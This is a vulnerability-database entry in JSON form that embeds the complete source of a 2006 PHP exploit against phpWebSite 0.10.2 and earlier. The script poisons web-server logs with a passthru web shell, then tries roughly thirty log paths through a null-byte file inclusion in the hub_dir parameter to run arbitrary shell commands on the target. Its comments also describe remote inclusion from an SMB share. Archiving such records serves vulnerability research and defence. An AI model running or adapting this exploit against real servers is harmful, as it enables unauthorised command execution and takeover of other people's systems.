Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-63474", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "phpWebSite <= 0.10.2 (hub_dir) Remote Commands Execution Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-63474", "cvelist": [], "description": "No description provided by source.", "viewCount": 5, "published": "2014-07-01T00:00:00", "sourceData": "\n #!/usr/bin/php -q -d short_open_tag=on\n<?\necho "PHPWebSite <= 0.10.2 remote cmmnds xctn\\r\\n";\necho "-> arbitrary local inclusion, works with magic_quotes_gpc = Off\\r\\n";\necho "by rgod, mail: rgod@autistici.org\\r\\n";\necho "site: http://retrogod.altervista.org\\r\\n\\r\\n";\n\nif ($argc<4) {\necho "Usage: php ".$argv[0]." host path cmd OPTIONS\\r\\n";\necho "host: target server (ip/hostname)\\r\\n";\necho "path: path to phpwebsite\\r\\n";\necho "cmd: a shell command\\r\\n";\necho "Options:\\r\\n";\necho " -p[port]: specify a port other than 80\\r\\n";\necho " -P[ip:port]: specify a proxy\\r\\n";\necho "Examples:\\r\\n";\necho "php ".$argv[0]." localhost /phpwebsite/ ls -la\\r\\n";\ndie;\n}\n\n/* explaination:\n vulnerable code in index.php at lines 21-29:\n\n...\n if (!isset($hub_dir)) {\n $hub_dir = NULL;\n}\nif (!preg_match ("/:\\/\\//i", $hub_dir)) {\n loadConfig($hub_dir);\n} else {\n exit('FATAL ERROR! Hub directory was malformed.');\n}\n...\n\nand at lines 125-143:\n\n...\nfunction loadConfig($hub_dir){\n\n if (file_exists($hub_dir . 'conf/config.php')) {\n \tif (filesize($hub_dir . 'conf/config.php') > 0) {\n\t include($hub_dir . 'conf/config.php');\n\n\t define('PHPWS_SOURCE_DIR', $source_dir);\n\n\n\t} else {\n\n\t header('Location: ./setup/set_config.php');\n\t exit();\n\t}\n } else {\n\theader('Location: ./setup/set_config.php');\n\texit();\n }\n}\n....\n\nso, you can include files from local resources, poc:\n\nhttp://[target]/[path]/index.php?hub_dir=/var/log/httpd/access_log%00\n\nyou don't see output, but we have some code in log files, it will be executed\n\nalso, on php5, arbitrary remote inclusion:\n\nhttp://[target]/[path]/index.php?hub_dir=\\\\192.168.1.3\\c\\\n\nincluding a full accessible share\nwhere on samba resource you have some code in conf/config.php\n\t\t\t\t\t\t\t\t\t */\nerror_reporting(0);\nini_set("max_execution_time",0);\nini_set("default_socket_timeout",5);\n\nfunction quick_dump($string)\n{\n $result='';$exa='';$cont=0;\n for ($i=0; $i<=strlen($string)-1; $i++)\n {\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\n {$result.=" .";}\n else\n {$result.=" ".$string[$i];}\n if (strlen(dechex(ord($string[$i])))==2)\n {$exa.=" ".dechex(ord($string[$i]));}\n else\n {$exa.=" 0".dechex(ord($string[$i]));}\n $cont++;if ($cont==15) {$cont=0; $result.="\\r\\n"; $exa.="\\r\\n";}\n }\n return $exa."\\r\\n".$result;\n}\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\nfunction sendpacketii($packet)\n{\n global $proxy, $host, $port, $html, $proxy_regex;\n if ($proxy=='') {\n $ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) {\n echo 'No response from '.$host.':'.$port; die;\n }\n }\n else {\n $c = preg_match($proxy_regex,$proxy);\n if (!$c) {\n echo 'Not a valid proxy...';die;\n }\n $parts=explode(':',$proxy);\n echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\\r\\n";\n $ock=fsockopen($parts[0],$parts[1]);\n if (!$ock) {\n echo 'No response from proxy...';die;\n }\n }\n fputs($ock,$packet);\n if ($proxy=='') {\n $html='';\n while (!feof($ock)) {\n $html.=fgets($ock);\n }\n }\n else {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\n $html.=fread($ock,1);\n }\n }\n fclose($ock);\n #debug\n #echo "\\r\\n".$html;\n}\n\n$host=$argv[1];\n$path=$argv[2];\n$cmd="";$port=80;$proxy="";\n\nfor ($i=3; $i<=$argc-1; $i++){\n$temp=$argv[$i][0].$argv[$i][1];\nif (($temp<>"-p") and ($temp<>"-P"))\n{$cmd.=" ".$argv[$i];}\nif ($temp=="-p")\n{\n $port=str_replace("-p","",$argv[$i]);\n}\nif ($temp=="-P")\n{\n $proxy=str_replace("-P","",$argv[$i]);\n}\n}\n$cmd=urlencode($cmd);\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\n\necho "[1] Injecting some code in log files...\\r\\n";\n$CODE ='<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {$_GET[cmd]=striplashes($_GET[cmd]);}';\n$CODE.='passthru($_GET[cmd]);echo 666;die;?>';\n$packet.="GET ".$path.$CODE." HTTP/1.1\\r\\n";\n$packet.="User-Agent: ".$CODE."\\r\\n";\n$packet.="Host: ".$serv."\\r\\n";\n$packet.="Connection: close\\r\\n\\r\\n";\n#debug\n#echo quick_dump($packet);\nsendpacketii($packet);\nsleep(2);\n\n# fill with possible locations\n$paths= array (\n "/var/log/httpd/access_log",\n "/var/log/httpd/error_log",\n "../apache/logs/error.log",\n "../apache/logs/access.log",\n "../../apache/logs/error.log",\n "../../apache/logs/access.log",\n "../../../apache/logs/error.log",\n "../../../apache/logs/access.log",\n "../../../../apache/logs/error.log",\n "../../../../apache/logs/access.log",\n "/etc/httpd/logs/acces_log",\n "/etc/httpd/logs/acces.log",\n "/etc/httpd/logs/error_log",\n "/etc/httpd/logs/error.log",\n "/var/www/logs/access_log",\n "/var/www/logs/access.log",\n "/usr/local/apache/logs/access_log",\n "/usr/local/apache/logs/access.log",\n "/var/log/apache/access_log",\n "/var/log/apache/access.log",\n "/var/log/access_log",\n "/var/www/logs/error_log",\n "/www/logs/error.log",\n "/usr/local/apache/logs/error_log",\n "/usr/local/apache/logs/error.log",\n "/var/log/apache/error_log",\n "/var/log/apache/error.log",\n "/var/log/access_log",\n "/var/log/error_log",\n);\n\nfor ($i=0; $i<=count($paths)-1; $i++)\n{\n $j=$i+2;\n echo "[".$j."] Trying with ".$paths[$i]."%00\\r\\n";\n $xpl=$paths[$i];\n $packet ="GET ".$p."index.php?cmd=".$cmd."&hub_dir=".$xpl."%00 HTTP/1.0\\r\\n";\n $packet.="Host: ".$host."\\r\\n";\n $packet.="Connection: Close\\r\\n\\r\\n";\n #debug, shows packets in a nice format\n #echo quick_dump($packet);\n sendpacketii($packet);\n if (strstr($html,"666")){\n echo "Exploit succeeded...\\r\\n";\n $temp=explode("666",$html);\n echo $temp[1];\n die;\n }\n}\n#if you are here...\necho "Exploit failed...";\n?>\n\n# milw0rm.com [2006-04-14]\n\n ", "id": "SSV:63474", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T17:14:00", "reporter": "Root", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645484115, "score": 1659785532, "epss": 1678850553}}
{}
phpWebSite <= 0.10.2 (hub_dir) Remote Commands Execution Exploit